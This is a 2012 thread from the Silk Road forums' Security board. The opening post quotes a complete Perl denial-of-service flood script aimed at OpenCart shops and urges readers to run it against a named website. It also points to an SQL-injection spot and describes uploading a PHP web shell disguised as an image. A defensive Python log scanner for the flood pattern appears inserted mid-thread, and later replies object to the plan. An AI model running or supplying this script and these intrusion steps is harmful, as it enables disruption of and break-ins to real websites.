Silk Road forums

Discussion => Security => Topic started by: Hiding on September 30, 2012, 05:08 pm

Title: btkoin Scam - help fight back - hack the planet
Post by: Hiding on September 30, 2012, 05:08 pm
I'm sure you're all getting spammed and bothered by multiple users, representing btkoin.com and their scam... I did a search and found something useful:
Quote
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : OpenCart 1.4.x 1.5 DDoS Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote DDos Attack (D.O.S Server)
# Tested on : Windows XP SP3 Français
# Target : OpenCart 1.4.x 1.5
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 00");
system("cls");
sleep(1);
# **  Allah Akbar **
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /shop/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >

I am good with Perl, but this is not my code. It does work though, as it has DoS'd their site a few times. It does keep coming back, but this is where you guys come in ;)
Anyone with Perl installed, run this for a bit and help keep it down.

from command prompt: type "(filename).pl btkoin.com /"

It will drop it within a few minutes.

Someone better with sqli might want to look around in /index.php?route=common/_DIR&product_id='sql.

I found a published LFIe using upload.shell.jpg, and uploaded a shell.php[null].jpg, but I'm not sure how to find it. It said the upload was successful, but the supposed-to-be base64'd random file name just said ":null"
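
A defender's view of the request pattern in the script quoted above, as an added example that is not part of the original thread: it scans web-server access logs (combined log format assumed) for bursts of POSTs to index.php carrying the script's hard-coded User-Agent. The function names, thresholds and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# User-Agent string hard-coded in the script quoted above.
FLOOD_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

def matches_signature(rec):
    """True for a POST to .../index.php carrying the script's fixed User-Agent."""
    path = rec["path"].split("?", 1)[0]
    return (rec["method"] == "POST" and path.endswith("/index.php")
            and rec["ua"] == FLOOD_UA)

def find_flooders(lines, window_s=10, threshold=5):
    """Return {ip: peak count} for clients whose matching requests reach
    `threshold` within any `window_s`-second sliding window."""
    recent = defaultdict(deque)   # ip -> timestamps inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not matches_signature(m):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def _line(ip, sec, method="POST", path="/index.php", ua=FLOOD_UA):
    return (f'{ip} - - [30/Sep/2012:17:08:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" 200 512 "-" "{ua}"')

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE = ([_line("203.0.113.7", s) for s in range(0, 8)]          # burst
          + [_line("198.51.100.4", s * 7) for s in range(0, 8)]   # slow client
          + [_line("192.0.2.9", s, ua="Mozilla/5.0") for s in range(8)]
          + [_line("192.0.2.10", s, method="GET") for s in range(8)])

if __name__ == "__main__":
    print(find_flooders(SAMPLE))
```

Because the User-Agent is just a string in the request, treat it as a supplementary signal and keep a rate limit on POSTs to index.php regardless of it.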

Title: Re: btkoin Scam - help fight back - hack the planet
Post by: taseMeBro on October 01, 2012, 02:26 am
Um...

I don't think anyone here is going to run a script that was taken from the SR Forums to flood a specific address on clearnet, and it's a serious douche move to send packet floods over Tor; it has limited resources as it is.

Title: Re: btkoin Scam - help fight back - hack the planet
Post by: BanDit on October 05, 2012, 11:22 am
Confirmed they are a scam?

Does it make me a bad person or whatever that I wouldn't use a script written by a religious nutter that actually comments in stuff like

# ********* In The name of Allah ************

Give a fuck that it's Allah too, would be as bad if it was like...

# ********* In The name of Buddha ************

or

# ********* In The name of L. Ron Hubbard ************

I mean really in the world of hacking there should be no religion, race or gender.

BanDit